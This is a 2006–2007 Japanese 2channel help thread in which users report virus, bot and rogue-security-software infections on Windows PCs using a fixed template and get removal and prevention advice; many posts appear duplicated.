それとさ、なんでこれ41なの?前39だったよね・・
23 :これいれるんじゃなかったの:2006/12/27(水) 02:45:31
>>982
乙です 私は異論ありません
あとBOTに関してのテンプレを入れたほうがいいのではないかと思います
以下サイバークリーンセンターからの引用ですがいかがなものでしょうか
ボットにご注意!!
ボットとは、コンピュータを悪用することを目的に作られた悪性プログラムで、コンピュータに感染すると、
インターネットを通じて悪意を持った攻撃者(以下「攻撃者」という)が、あなたのコンピュータを外部から遠隔操作します。
感染すると、この攻撃者があなたのコンピュータを操り「迷惑メールの大量配信」、「特定サイトの攻撃」等の迷惑行為をはじめ、
あなたのコンピュータ内の情報を盗み出す「スパイ活動」など深刻な被害をもたらします。
この操られる動作が、ロボット(Robot)に似ているところから、ボット(BOT)と呼ばれています。
ボットに感染したコンピュータは、攻撃者が用意した指令サーバなどに自動的に接続され、
数十〜数百万台のボット感染コンピュータを従えた「ボットネットワーク」と言われる巨大ネットワークを形成します。
感染したコンピュータは、攻撃者からの命令を待ち受け、攻撃者が下す命令によって、攻撃者の意のままに数十〜数百万台の感染コンピュータが操られた結果、
フィッシング目的などのスパムメールの大量送信や、特定サイトへのDDoS攻撃などに利用され、とても大きな脅威となります。
このため、感染コンピュータを使用しているユーザーは、知らぬ間に犯罪の踏み台にされ、「被害者」であると同時に「加害者」にもなってしまうのです
〜サイバークリーンセンター より引用〜
サイバークリーンセンター ボットとは
https://www.ccc.go.jp/bot/index.html
TREND MICRO ボット系ウイルス対策Web
http://www.trendmicro.com/jp/security/web/archive/overview/bot.htm
インターネット上の新たな脅威「ボット(bot)」に気をつけろ!(上)
http://itpro.nikkeibp.co.jp/free/ITPro/OPINION/20041215/153889/?ST=security
乙です 私は異論ありません
あとBOTに関してのテンプレを入れたほうがいいのではないかと思います
以下サイバークリーンセンターからの引用ですがいかがなものでしょうか
ボットにご注意!!
ボットとは、コンピュータを悪用することを目的に作られた悪性プログラムで、コンピュータに感染すると、
インターネットを通じて悪意を持った攻撃者(以下「攻撃者」という)が、あなたのコンピュータを外部から遠隔操作します。
感染すると、この攻撃者があなたのコンピュータを操り「迷惑メールの大量配信」、「特定サイトの攻撃」等の迷惑行為をはじめ、
あなたのコンピュータ内の情報を盗み出す「スパイ活動」など深刻な被害をもたらします。
この操られる動作が、ロボット(Robot)に似ているところから、ボット(BOT)と呼ばれています。
ボットに感染したコンピュータは、攻撃者が用意した指令サーバなどに自動的に接続され、
数十〜数百万台のボット感染コンピュータを従えた「ボットネットワーク」と言われる巨大ネットワークを形成します。
感染したコンピュータは、攻撃者からの命令を待ち受け、攻撃者が下す命令によって、攻撃者の意のままに数十〜数百万台の感染コンピュータが操られた結果、
フィッシング目的などのスパムメールの大量送信や、特定サイトへのDDoS攻撃などに利用され、とても大きな脅威となります。
このため、感染コンピュータを使用しているユーザーは、知らぬ間に犯罪の踏み台にされ、「被害者」であると同時に「加害者」にもなってしまうのです
〜サイバークリーンセンター より引用〜
サイバークリーンセンター ボットとは
https://www.ccc.go.jp/bot/index.html
TREND MICRO ボット系ウイルス対策Web
http://www.trendmicro.com/jp/security/web/archive/overview/bot.htm
インターネット上の新たな脅威「ボット(bot)」に気をつけろ!(上)
http://itpro.nikkeibp.co.jp/free/ITPro/OPINION/20041215/153889/?ST=security
24 :名無しさん@お腹いっぱい。:2006/12/27(水) 02:46:12
新しいテンプレ(一部追記)は以下の通りで異論は無いでしょうか。
【使用OS】
【MicrosoftUpdate】
【使用セキュリティソフト】
【セキュリティソフトの定義ファイルは最新の状態であるか】
【ルータの有無】
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
【どんな症状が出るか】
【症状が出る前に何をやったか】
【症状を解決しようとどのような処置を取ったか】
【その他の質問】
>【ルータの有無】
ぶっちゃけこれ要らないんじゃないと思う人もいるけど、
質問者がWindows2000でルータ無しでFWソフトも無しの環境で、
リカバリしなくちゃいけないような症状に陥っている場合、
それでリカバリしたは良いけど、その直後にネットに繋いで即再感染
という自体も有り得るので。(その際はルータか、FW付きアンチウイルスソフトの購入を奨める)
WindowsXPの場合はデフォルトでFWが入ってる(SP2の場合はデフォルトで有効になってる)
から、こちらのOSの場合はルータが無くてもFWを有効にさえしとけば、外部からの
侵入はとりあえず遮断できる。
【使用OS】
【MicrosoftUpdate】
【使用セキュリティソフト】
【セキュリティソフトの定義ファイルは最新の状態であるか】
【ルータの有無】
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
【どんな症状が出るか】
【症状が出る前に何をやったか】
【症状を解決しようとどのような処置を取ったか】
【その他の質問】
>【ルータの有無】
ぶっちゃけこれ要らないんじゃないと思う人もいるけど、
質問者がWindows2000でルータ無しでFWソフトも無しの環境で、
リカバリしなくちゃいけないような症状に陥っている場合、
それでリカバリしたは良いけど、その直後にネットに繋いで即再感染
という自体も有り得るので。(その際はルータか、FW付きアンチウイルスソフトの購入を奨める)
WindowsXPの場合はデフォルトでFWが入ってる(SP2の場合はデフォルトで有効になってる)
から、こちらのOSの場合はルータが無くてもFWを有効にさえしとけば、外部からの
侵入はとりあえず遮断できる。
25 :名無しさん@お腹いっぱい。:2006/12/27(水) 03:15:08
こいつ>>23何者?
26 :名無しさん@お腹いっぱい。:2006/12/27(水) 04:27:40
現在の更新の情報
合計時間: 28 s
- Vps: 更新されました
(前のバージョン: 0662-1, 更新後のバージョン: 0662-2)
サーバー: download6.avast.com (67.15.0.83)
ダウンロード・ファイル: 5 (1.24 KB)
ダウンロード時間: 8 s
合計時間: 28 s
- Vps: 更新されました
(前のバージョン: 0662-1, 更新後のバージョン: 0662-2)
サーバー: download6.avast.com (67.15.0.83)
ダウンロード・ファイル: 5 (1.24 KB)
ダウンロード時間: 8 s
>>23
それ書いたの俺
テンプレにいれるのは時期が早いかなとおもったから
俺が書いたのはコピペだし 住人が知恵をだしあって練られたものを入れたかったから
このスレが41なのは38が重複して前スレが実質40だったからこのスレで番号修正しただけ
それ書いたの俺
テンプレにいれるのは時期が早いかなとおもったから
俺が書いたのはコピペだし 住人が知恵をだしあって練られたものを入れたかったから
このスレが41なのは38が重複して前スレが実質40だったからこのスレで番号修正しただけ
28 :名無しさん@お腹いっぱい。:2006/12/27(水) 07:35:56
>>27
>1おつです 17←こいつをどうにかしてください
>1おつです 17←こいつをどうにかしてください
29 :名無しさん@お腹いっぱい。:2006/12/27(水) 15:28:08
【使用OS】
XP home
【MicrosoftUpdate】
してる
【使用セキュリティソフト】
VB2006
【セキュリティソフトの定義ファイルは最新の状態であるか】
期限切れで最新ではない
【ルータの有無】
なし
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
検出なし
【どんな症状が出るか】
nyフォルダ内のファイルが全て画像(bmp)になる
その画像↓
http://up.mugitya.com/img/Lv.1_up69172.bmp
【症状が出る前に何をやったか】
nyで動画ファイル落として実行
【症状を解決しようとどのような処置を取ったか】
HDにつながってるUSB引っこ抜いた
ネット切断
XP home
【MicrosoftUpdate】
してる
【使用セキュリティソフト】
VB2006
【セキュリティソフトの定義ファイルは最新の状態であるか】
期限切れで最新ではない
【ルータの有無】
なし
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
検出なし
【どんな症状が出るか】
nyフォルダ内のファイルが全て画像(bmp)になる
その画像↓
http://up.mugitya.com/img/Lv.1_up69172.bmp
【症状が出る前に何をやったか】
nyで動画ファイル落として実行
【症状を解決しようとどのような処置を取ったか】
HDにつながってるUSB引っこ抜いた
ネット切断
30 :名無しさん@お腹いっぱい。:2006/12/27(水) 15:35:08
31 :名無しさん@お腹いっぱい。:2006/12/27(水) 16:02:18
動画ファイルをどうやって「実行」するのか知りたい……。
32 :名無しさん@お腹いっぱい。:2006/12/27(水) 16:17:47
「メッセンジャー」からお知らせです、と
しつこく送られてくるものに、
どう対処したら良いのでしょうか?
どなたか、ご指導くださいませ?
しつこく送られてくるものに、
どう対処したら良いのでしょうか?
どなたか、ご指導くださいませ?
33 :名無しさん@お腹いっぱい。:2006/12/27(水) 16:28:12
34 :名無しさん@お腹いっぱい。:2006/12/27(水) 16:34:00
>>32
あんいんすと〜る
あんいんすと〜る
35 :名無しさん@お腹いっぱい。:2006/12/27(水) 17:32:31
36 :名無しさん@お腹いっぱい。:2006/12/27(水) 18:25:04
ゴミどもうだうだいってねーでちゃんと答えろや
何のためにこの場所提供してやってんだよ
この世のクズが
何のためにこの場所提供してやってんだよ
この世のクズが
37 : ◆N9P3SuvBPo :2006/12/27(水) 18:30:42
>32
これって俗に言うメッセンジャースパムとか言う奴ではないでしょうかね?
>29
P2P系とはあまり関わりたくないものですね。
XPでルータ無しだとすると、リカバリ後ネットに繋ぐ前に…
あとは任せたw
これって俗に言うメッセンジャースパムとか言う奴ではないでしょうかね?
>29
P2P系とはあまり関わりたくないものですね。
XPでルータ無しだとすると、リカバリ後ネットに繋ぐ前に…
あとは任せたw
38 :名無しさん@お腹いっぱい。:2006/12/27(水) 19:05:21
俺はルータもAVもいれているから気にする必要性は無いと思うんだけど、98や2000、XPで
ルータも持たずFWも持たず接続する人もいるわけでしょ。その場合は・・ってこと何だけど。
祈るしかないわけですか。でもその間に感染ってあまり聞かないような気がするなっておもうんだけど。
OSアップデートのファイルだけ他のPCから落としてRに焼いてインストールするってできますか
またはリカバリーCD自体を作るとかかなぁ?俺にはできんけど
俺は入れ直しかノートンゴースト使ってるけど
だれかおしえてちょんまげ
やっぱり2000で98でルータ無しFW無しはまずいんだね、
そこまでは俺も知ってたけど、でもどのような感染経路で感染するの?
OSアップデートのファイルだけ他のPCから落としてRに焼いてインストールするってできますか
またはリカバリーCD自体を作るとかかなぁ?俺にはできんけど
ルータも持たずFWも持たず接続する人もいるわけでしょ。その場合は・・ってこと何だけど。
祈るしかないわけですか。でもその間に感染ってあまり聞かないような気がするなっておもうんだけど。
OSアップデートのファイルだけ他のPCから落としてRに焼いてインストールするってできますか
またはリカバリーCD自体を作るとかかなぁ?俺にはできんけど
俺は入れ直しかノートンゴースト使ってるけど
だれかおしえてちょんまげ
やっぱり2000で98でルータ無しFW無しはまずいんだね、
そこまでは俺も知ってたけど、でもどのような感染経路で感染するの?
OSアップデートのファイルだけ他のPCから落としてRに焼いてインストールするってできますか
またはリカバリーCD自体を作るとかかなぁ?俺にはできんけど
39 :名無しさん@お腹いっぱい。:2006/12/27(水) 19:43:05
Windows XP SP2 適用済みインストールイメージの作成方法
http://support.microsoft.com/kb/884746/ja
ワームに感染しない Windows 2000/XP のインストール手順
http://tomcat.nyanta.jp/t_html/contents/wininstall.shtml
http://support.microsoft.com/kb/884746/ja
ワームに感染しない Windows 2000/XP のインストール手順
http://tomcat.nyanta.jp/t_html/contents/wininstall.shtml
40 :名無しさん@お腹いっぱい。:2006/12/27(水) 20:01:29
ネットワークワームがポートの開いているネットワークサービスにパケットを送信してバッファオーバーフローが発生。
この時点でレジスタ内の戻りアドレスが偽装されているので
メモリ上のそのアドレスから実行されて何でもインストールされてしまう。
この時点でレジスタ内の戻りアドレスが偽装されているので
メモリ上のそのアドレスから実行されて何でもインストールされてしまう。
41 :名無しさん@お腹いっぱい。:2006/12/27(水) 20:44:22
>>39
センキューベルマエロッチ
センキューベルマエロッチ
42 :名無しさん@お腹いっぱい。:2006/12/27(水) 20:55:02
SP2適用済イメージ作成段階でエラー出るかもしれませんが、解決方法は・・・教えませんよ(´・ε・`)
43 :名無しさん@お腹いっぱい。:2006/12/27(水) 21:05:42
【使用OS】 windows XP
【MicrosoftUpdate】 してます
【使用セキュリティソフト】 ウイルスセキュリティー
【セキュリティソフトの定義ファイルは最新の状態であるか】 最新です
【ルータの有無】 無し
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 Win32.Bolzano.5396.b
【どんな症状が出るか】 わかりません
【症状が出る前に何をやったか】mp3が入ったzipのダウンロード&wavをmp3にエンコードするフリーソフト をインストールしました
【症状を解決しようとどのような処置を取ったか】 ウイルスセキュリティーで削除しました
【その他の質問】このウイルスに感染するとどうなるのですか
【MicrosoftUpdate】 してます
【使用セキュリティソフト】 ウイルスセキュリティー
【セキュリティソフトの定義ファイルは最新の状態であるか】 最新です
【ルータの有無】 無し
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 Win32.Bolzano.5396.b
【どんな症状が出るか】 わかりません
【症状が出る前に何をやったか】mp3が入ったzipのダウンロード&wavをmp3にエンコードするフリーソフト をインストールしました
【症状を解決しようとどのような処置を取ったか】 ウイルスセキュリティーで削除しました
【その他の質問】このウイルスに感染するとどうなるのですか
44 :名無しさん@お腹いっぱい。:2006/12/27(水) 21:08:50
>>43
ソースネクストのサイトにウイルス情報公開してんじゃね?
ソースネクストのサイトにウイルス情報公開してんじゃね?
45 :名無しさん@お腹いっぱい。:2006/12/27(水) 21:25:14
46 :名無しさん@お腹いっぱい。:2006/12/27(水) 21:41:55
>>44
>>45
ありがとうございました
読んでも理解出来ないのですが...
XPでは影響ないのでしょうか?
ひとつ思い出したのですが、ウイルスセキュリティーのファイアーウォールの履歴が残らない現象が続いてました
これ関係ありそうですか?どなたかご存知の方教えてください
今は昨日バージョンアップしたばかりで昨日からの履歴は残っています
>>45
ありがとうございました
読んでも理解出来ないのですが...
XPでは影響ないのでしょうか?
ひとつ思い出したのですが、ウイルスセキュリティーのファイアーウォールの履歴が残らない現象が続いてました
これ関係ありそうですか?どなたかご存知の方教えてください
今は昨日バージョンアップしたばかりで昨日からの履歴は残っています
47 :名無しさん@お腹いっぱい。:2006/12/27(水) 21:43:39
48 : ◆N9P3SuvBPo :2006/12/27(水) 21:49:33
>43
>ウイルス名:Win32.Bolzano.5396.b
検出された場所は?
>46
>ファイアーウォールの履歴が残らない現象
これ、何時からなってた?
43のWin32.Bolzano.5396.bが検出される前・後?
>ウイルス名:Win32.Bolzano.5396.b
検出された場所は?
>46
>ファイアーウォールの履歴が残らない現象
これ、何時からなってた?
43のWin32.Bolzano.5396.bが検出される前・後?
49 :名無しさん@お腹いっぱい。:2006/12/27(水) 21:49:57
50 :名無しさん@お腹いっぱい。:2006/12/27(水) 21:56:57
>>48
WINDOWSの中のrepairです
DS_SOFTWAREというファイルでした
Bolzanoが検出されるずっと前から履歴が残らない状態でした
ウイルスセキュリティーを再インストールすれとしばらくは履歴が残っていました
何をきっかけに履歴が残らないのか分らないのですが
Outlook Express が圧縮するようにメッセージが出てました(関係ないかも)
WINDOWSの中のrepairです
DS_SOFTWAREというファイルでした
Bolzanoが検出されるずっと前から履歴が残らない状態でした
ウイルスセキュリティーを再インストールすれとしばらくは履歴が残っていました
何をきっかけに履歴が残らないのか分らないのですが
Outlook Express が圧縮するようにメッセージが出てました(関係ないかも)
51 : ◆N9P3SuvBPo :2006/12/27(水) 22:12:15
>50
削除したんなら、何の心配はいらないと思うけど、それでも
心配なら>47の指示をやって、何も検出されなかったら
しばらく様子見かな?
そして
FWの履歴が残らなくなってる件については、
サポートに問い合わせてみたほうが良いと思われます。
もしくはグーグルで検索して原因を調べるとか。
削除したんなら、何の心配はいらないと思うけど、それでも
心配なら>47の指示をやって、何も検出されなかったら
しばらく様子見かな?
そして
FWの履歴が残らなくなってる件については、
サポートに問い合わせてみたほうが良いと思われます。
もしくはグーグルで検索して原因を調べるとか。
52 :名無しさん@お腹いっぱい。:2006/12/27(水) 22:29:23
このファイル
Doom_2_wad_cracked_by_DFT_S60_v1.0.sis
http:〜〜〜〜みたいにしたやつある?
Doom_2_wad_cracked_by_DFT_S60_v1.0.sis
http:〜〜〜〜みたいにしたやつある?
53 :名無しさん@お腹いっぱい。:2006/12/27(水) 22:36:21
>>51
ありがとうございました
ありがとうございました
54 :名無しさん@お腹いっぱい。:2006/12/28(木) 01:30:40
55 :名無しさん@お腹いっぱい。:2006/12/28(木) 13:36:23
shareEDGEのサイトにあるオンラインスキャンを実行すると前スレの262と同じ結果が
でてSmiley Sourceが検出されるのですがこのオンラインスキャンサービスでは削除
できません。
spybotでは検出されません。X-Cleaner買ってね♪ってことですかねww
でてSmiley Sourceが検出されるのですがこのオンラインスキャンサービスでは削除
できません。
spybotでは検出されません。X-Cleaner買ってね♪ってことですかねww
56 :名無しさん@お腹いっぱい。:2006/12/28(木) 14:13:41
>>55
下記のURLにたくさんフリーのアンチスパイウェアソフトがあるので、
運が行ければどれかで駆除できるかも。w
まあ、いちいち試してみるのが面倒なら、最初からおとなしくX-Cleaner買う。
http://cowscorpion.com/Software/secu02s.html
下記のURLにたくさんフリーのアンチスパイウェアソフトがあるので、
運が行ければどれかで駆除できるかも。w
まあ、いちいち試してみるのが面倒なら、最初からおとなしくX-Cleaner買う。
http://cowscorpion.com/Software/secu02s.html
57 :名無しさん@お腹いっぱい。:2006/12/28(木) 17:39:24
SpyMarshalってプログラムがかってにインストールされました削除法おしえてください
検索しても外国のサイトしかでません
日本語訳したんですけど 危ないウィルスとしかわかりません
おねがいします!!
検索しても外国のサイトしかでません
日本語訳したんですけど 危ないウィルスとしかわかりません
おねがいします!!
58 :名無しさん@お腹いっぱい。:2006/12/28(木) 18:02:10
59 :名無しさん@お腹いっぱい。:2006/12/28(木) 18:39:58
>>57
BraveSentryのクローンらしいね いわゆるインチキセキュりティソフト
exploitを利用してるみたいだから各種updateは最新に
BraveSentryならこれで駆除できるみたいだけど
http://wiki.higaitaisaku.com/wiki.cgi?page=SmitfraudFix+%A4%CE%BB%C8%A4%A4%CA%FD
あとcounterspyが対応してるらしい ベータもあるけど評判わるいからなあ
それとマルチ乙w
BraveSentryのクローンらしいね いわゆるインチキセキュりティソフト
exploitを利用してるみたいだから各種updateは最新に
BraveSentryならこれで駆除できるみたいだけど
http://wiki.higaitaisaku.com/wiki.cgi?page=SmitfraudFix+%A4%CE%BB%C8%A4%A4%CA%FD
あとcounterspyが対応してるらしい ベータもあるけど評判わるいからなあ
それとマルチ乙w
60 :名無しさん@お腹いっぱい。:2006/12/29(金) 10:22:54
検索して解決しました。
使っているカスペルスキーインターネットセキュリティーのレジストリエントリが誤検出されるようです。
カスペルスキーのスレにもレスしときましたが、前スレの262さんKISを使っていませんか。
使っているカスペルスキーインターネットセキュリティーのレジストリエントリが誤検出されるようです。
カスペルスキーのスレにもレスしときましたが、前スレの262さんKISを使っていませんか。
×前スレ262
○前スレ261
カスぺいれてるってかかれてますねw
○前スレ261
カスぺいれてるってかかれてますねw
63 :名無しさん@お腹いっぱい。:2006/12/30(土) 22:20:04
※新型botにご注意を※
Backdoor.Win32.SdBot.bcf 感染被害の詳細
ttp://forum.higaitaisaku.com/viewtopic.php?t=1325&sid=c9ed311a03141dc24bdc2b67f9384dc5
12月30日現在で検出、駆除可能なアンチウイルス製品
製品名 検出名
Fortinet W32/IRCBot.YW!tr.bdr
kaspersky Backdoor.Win32.SdBot.bcf
Avira TR.Agent.acp
Mcafee ..W32/Sdbot.worm.gen.ca
AVG .Anti-spyware Backdoor.sdbot.bcf
※その他のkasperskyエンジン搭載製品(F-Secureなど)でも可能。
64 :名無しさん@お腹いっぱい。:2006/12/31(日) 00:38:39
>>63
報告乙です
Big Yellowってやつですかね
symantec製品の脆弱性がねらわれているようですね
該当ユーザーはパッチを確認したほうがよいかと
僕はリカバリ終了しました
来年もよろしくおねがいします
報告乙です
Big Yellowってやつですかね
symantec製品の脆弱性がねらわれているようですね
該当ユーザーはパッチを確認したほうがよいかと
僕はリカバリ終了しました
来年もよろしくおねがいします
65 :名無しさん@お腹いっぱい。:2007/01/01(月) 01:44:37
【使用OS】 Windows XP
【MicrosoftUpdate】 しています
【使用セキュリティソフト】 Norton・Ad-Aware
【セキュリティソフトの定義ファイルは最新の状態であるか】 更新済
【ルータの有無】 無し
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】検出されない
【どんな症状が出るか】 デスクトップに「ウィルスに感染した〜」「サイトを見た履歴が〜」等と出て
ソフトをダウンロードするようにしつこく迫ってくる
【症状が出る前に何をやったか】 Cabosでファイルを落とした
【症状を解決しようとどのような処置を取ったか】 セーフモードと通常起動で完全スキャン
Symantecでウィルスの情報を見てレジストリをチェック(異常なし)
【その他の質問】 ウィルスに感染している様子がないのに広告(SystemDoctor・DriverCleanerからの)
が表示されますこのようの場合どうすれば良いのでしょうか?
【MicrosoftUpdate】 しています
【使用セキュリティソフト】 Norton・Ad-Aware
【セキュリティソフトの定義ファイルは最新の状態であるか】 更新済
【ルータの有無】 無し
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】検出されない
【どんな症状が出るか】 デスクトップに「ウィルスに感染した〜」「サイトを見た履歴が〜」等と出て
ソフトをダウンロードするようにしつこく迫ってくる
【症状が出る前に何をやったか】 Cabosでファイルを落とした
【症状を解決しようとどのような処置を取ったか】 セーフモードと通常起動で完全スキャン
Symantecでウィルスの情報を見てレジストリをチェック(異常なし)
【その他の質問】 ウィルスに感染している様子がないのに広告(SystemDoctor・DriverCleanerからの)
が表示されますこのようの場合どうすれば良いのでしょうか?
66 :名無しさん@お腹いっぱい。:2007/01/01(月) 01:55:53
>>65
>>8の他メーカーでオンラインスキャンして
検出されたものをよく確認して、
http://pc10.2ch.net/test/read.cgi/sec/1167281093/9 の方法で提出
この場合は、(※「ディスクからファイルを削除する」にチェックを入れない)
その後で、削除対応しているメーカーならオンラインで削除してもらう。
>>8の他メーカーでオンラインスキャンして
検出されたものをよく確認して、
http://pc10.2ch.net/test/read.cgi/sec/1167281093/9 の方法で提出
この場合は、(※「ディスクからファイルを削除する」にチェックを入れない)
その後で、削除対応しているメーカーならオンラインで削除してもらう。
67 :名無しさん@お腹いっぱい。:2007/01/01(月) 04:16:44
【使用OS】
98SE
【MicrosoftUpdate】
サポート終了まではやってました
【使用セキュリティソフト】
バスター2001(本家で検索エンジンとパターンファイルDLできるので手動で入れ替えてる)
【セキュリティソフトの定義ファイルは最新の状態であるか】
上記の通り一応入れ替えてます
【ルータの有無】
有り
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
検出なし。無料のオンラインスキャンもやったが出て来なかった。Ad-Awareもクッキー以外何もでず
【どんな症状が出るか】
@D:\○○¥×× ←の○○以下の階層のフォルダとファイルが全て文字化けリネームされた _| ̄|○。拡張子もなしに。
A@になる3日前程から時々途中からネットにつながらない事が数十分あってモデムが悪いのかな?と思ってた
【症状が出る前に何をやったか】
サイトから画像と動画落としたか、フリーソフト入れた(ウイルス反応はないが・・)ぐらいしか思い出せない。
【症状を解決しようとどのような処置を取ったか】
原因が不明なのでとりあえず2ヶ月程前にCドライブのバックアップとってたのでWINDOWSフォルダだけ総とっかえした。
【その他の質問】
全てリネーム(しかも文字化けで)するようなウイルスがあるのでしょうか?
リネームされたのでもう前のファイル名に戻すのは不可能でしょうかねぇ・・やっぱ。
98SE
【MicrosoftUpdate】
サポート終了まではやってました
【使用セキュリティソフト】
バスター2001(本家で検索エンジンとパターンファイルDLできるので手動で入れ替えてる)
【セキュリティソフトの定義ファイルは最新の状態であるか】
上記の通り一応入れ替えてます
【ルータの有無】
有り
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
検出なし。無料のオンラインスキャンもやったが出て来なかった。Ad-Awareもクッキー以外何もでず
【どんな症状が出るか】
@D:\○○¥×× ←の○○以下の階層のフォルダとファイルが全て文字化けリネームされた _| ̄|○。拡張子もなしに。
A@になる3日前程から時々途中からネットにつながらない事が数十分あってモデムが悪いのかな?と思ってた
【症状が出る前に何をやったか】
サイトから画像と動画落としたか、フリーソフト入れた(ウイルス反応はないが・・)ぐらいしか思い出せない。
【症状を解決しようとどのような処置を取ったか】
原因が不明なのでとりあえず2ヶ月程前にCドライブのバックアップとってたのでWINDOWSフォルダだけ総とっかえした。
【その他の質問】
全てリネーム(しかも文字化けで)するようなウイルスがあるのでしょうか?
リネームされたのでもう前のファイル名に戻すのは不可能でしょうかねぇ・・やっぱ。
68 :名無しさん@お腹いっぱい。:2007/01/01(月) 04:45:20
どっちかというとHDDの方に問題がありそう。
>>68
HDDですか・・。それは予想できませんでした。
Maxtarとは言えバルクの使ってますがHDDに問題あった場合ファイルリネームとか勝手になるのもですかねぇ?
とりあえず現状は無料のウイルススキャン渡り歩いて徹底してる最中です。
HDDに問題あるのならちょっと悲しいですね・・。ファイルもHDDも全て諦めるはめになってしまう。
HDDですか・・。それは予想できませんでした。
Maxtarとは言えバルクの使ってますがHDDに問題あった場合ファイルリネームとか勝手になるのもですかねぇ?
とりあえず現状は無料のウイルススキャン渡り歩いて徹底してる最中です。
HDDに問題あるのならちょっと悲しいですね・・。ファイルもHDDも全て諦めるはめになってしまう。
なんか症状が悪化しました・・。
D:\ にあるフォルダ認識してないというかウィンドウズロゴみたいなのになって下の階層にすら行けなくなった。
これはなんかHDDっぽいですね。バーティション分割してるもう片方のドライブは大丈夫なんですが・・。
時間かかるけどクラスタスキャンもやってみます。正月早々つらい・・。
D:\ にあるフォルダ認識してないというかウィンドウズロゴみたいなのになって下の階層にすら行けなくなった。
これはなんかHDDっぽいですね。バーティション分割してるもう片方のドライブは大丈夫なんですが・・。
時間かかるけどクラスタスキャンもやってみます。正月早々つらい・・。
71 : ◆N9P3SuvBPo :2007/01/01(月) 11:32:59
>65
>【症状が出る前に何をやったか】 Cabosでファイルを落とした
P2P(ファイル交換ソフト)系の質問はDownload板へどうぞ。
>70
こういう時は【アダ被】へGO!
>【症状が出る前に何をやったか】 Cabosでファイルを落とした
P2P(ファイル交換ソフト)系の質問はDownload板へどうぞ。
>70
こういう時は【アダ被】へGO!
HDDの方の問題では?と>>68さんの指摘を受けハードウェア板に行ったら解決できました。
情けない事ですが原因はおそらくBIGDRIVE問題です。
137Gの壁があるのは知ってました(単に137G以上は認識できないのだろうという程度で)
そこで200GのHDDをパーティション分割してDドライブともう1つのドライブに分けて使っていたのです。
それがそもそもの間違いでした。一応BIGDRIVE問題でググったら以下のサイト見つけて納得。
HDD BigDrive問題の確認方法
http://miya0.dyndns.org/pc/other/BigDrive.html
結果ウイルスではありませんでしたがなんとか解決へ向かいそうです。
一部サルベージは成功しましたが、それでも結構失いました。
みなさんどうもお騒がせしました。そしてありがとう。
情けない事ですが原因はおそらくBIGDRIVE問題です。
137Gの壁があるのは知ってました(単に137G以上は認識できないのだろうという程度で)
そこで200GのHDDをパーティション分割してDドライブともう1つのドライブに分けて使っていたのです。
それがそもそもの間違いでした。一応BIGDRIVE問題でググったら以下のサイト見つけて納得。
HDD BigDrive問題の確認方法
http://miya0.dyndns.org/pc/other/BigDrive.html
結果ウイルスではありませんでしたがなんとか解決へ向かいそうです。
一部サルベージは成功しましたが、それでも結構失いました。
みなさんどうもお騒がせしました。そしてありがとう。
73 :名無しさん@お腹いっぱい。:2007/01/02(火) 05:47:13
【使用OS】 windows XP HOME SP2
【MicrosoftUpdate】
やってあります
【使用セキュリティソフト】
ノートンアンチウィルス 2002
【セキュリティソフトの定義ファイルは最新の状態であるか】
最新です
【ルータの有無】
あります
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
ないです
【どんな症状が出るか】
気が付くと、プロセスの中に
E_FARNANJ.EXE
と言うのがあって、ググっても何も見つからないので怪しいと思いました。
【症状が出る前に何をやったか】
特に何かした覚えはないです
【症状を解決しようとどのような処置を取ったか】
特になにもしてないです
【その他の質問】
このプログラムが何であるのか、ご存知でしたら教えて下さいm(__)m
【MicrosoftUpdate】
やってあります
【使用セキュリティソフト】
ノートンアンチウィルス 2002
【セキュリティソフトの定義ファイルは最新の状態であるか】
最新です
【ルータの有無】
あります
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
ないです
【どんな症状が出るか】
気が付くと、プロセスの中に
E_FARNANJ.EXE
と言うのがあって、ググっても何も見つからないので怪しいと思いました。
【症状が出る前に何をやったか】
特に何かした覚えはないです
【症状を解決しようとどのような処置を取ったか】
特になにもしてないです
【その他の質問】
このプログラムが何であるのか、ご存知でしたら教えて下さいm(__)m
ぐお、自己解決しました。
エプソンの
EPSON Status Monitor 3
というプログラムでした。
そう言えば、直前にプリンタドライバを入れてましたね・・・orz
お騒がせ致しましたm(__)m
エプソンの
EPSON Status Monitor 3
というプログラムでした。
そう言えば、直前にプリンタドライバを入れてましたね・・・orz
お騒がせ致しましたm(__)m
75 :名無しさん@お腹いっぱい。:2007/01/02(火) 11:54:01
【症状が出る前に何をやったか】
特に何かした覚えはないです
特に何かした覚えはないです
76 :やちまた:2007/01/03(水) 19:29:33
Winnyからダウンロードしたwmvファイルをクリックしたら、
小さいウィンドウで、「金子被告が有罪判決でたのに・・・(以下略)」という文字とアニメの絵が表示され、
ダウンロード先のフォルダやwinnyのフォルダの中のtxtファイルやhtmlファイルがjpgファイルに変換され、
色々なプログラム(IEやOperaなど)の実行ファイルが削除され、
ノートンのセキュリティソフト(ウィルスファイル実行時は機能を停止させていた・・・・)も機能しなくなってしまいました。
どなたか、ウィルス名・駆除・修復方法を教えてください。
ウィルス名だけでも、参考アドレスだけでも結構です。
お願いいたします。
小さいウィンドウで、「金子被告が有罪判決でたのに・・・(以下略)」という文字とアニメの絵が表示され、
ダウンロード先のフォルダやwinnyのフォルダの中のtxtファイルやhtmlファイルがjpgファイルに変換され、
色々なプログラム(IEやOperaなど)の実行ファイルが削除され、
ノートンのセキュリティソフト(ウィルスファイル実行時は機能を停止させていた・・・・)も機能しなくなってしまいました。
どなたか、ウィルス名・駆除・修復方法を教えてください。
ウィルス名だけでも、参考アドレスだけでも結構です。
お願いいたします。
77 :名無しさん@お腹いっぱい。:2007/01/03(水) 19:33:32
原田ウイルスじゃね
78 :名無しさん@お腹いっぱい。:2007/01/03(水) 21:01:02
ふたばの専ブラのあれをウイルス勘違いして
今日一日つぶしたおrz
今日一日つぶしたおrz
79 :やちまた:2007/01/03(水) 21:02:21
>77さん
そうみたいですね。
そうみたいですね。
